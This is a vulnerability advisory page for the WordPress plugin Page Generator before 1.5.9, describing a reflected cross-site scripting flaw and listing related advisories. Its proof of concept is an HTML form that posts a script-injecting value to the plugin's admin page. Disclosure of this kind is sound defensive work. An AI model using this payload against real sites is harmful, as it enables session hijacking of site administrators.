Page Generator < 1.5.9 – Reflected Cross-Site Scripting | Plugin Vulnerabilities

Description

The plugin does not properly escape user input before outputting it back in attributes, leading to reflected Cross-Site Scripting issues

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=page-generator-keywords&cmd=form" method="POST">
      <input type="hidden" name="keyword" value='"><script>alert(/XSS/)</script>' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

Fixed in 1.5.9

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

2d40c399-cbc3-463b-ba9b-6f9453fb9551

Timeline

Publicly Published

2021-09-20 (about 4 years ago)

Added

2021-09-20 (about 4 years ago)

Last Updated

2021-09-20 (about 4 years ago)

Other

Published

Title

Published

2021-12-06

Title

Multivendor Marketplace Solution for WooCommerce < 3.8.4 - Reflected Cross-Site Scripting

Published

2021-08-16

Title

Email Artillery <= 4.1 - Multiple Authenticated SQL Injections

Published

2024-11-14

Title

Geocache Stat Bar Widget <= 0.911 - Admin+ Stored XSS

Published

2025-04-16

Title

WP Data Access < 5.5.37 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2025-05-07

Title

Logo Showcase < 3.0.5 - Authenticated (Contributor+) Stored Cross-Site Scripting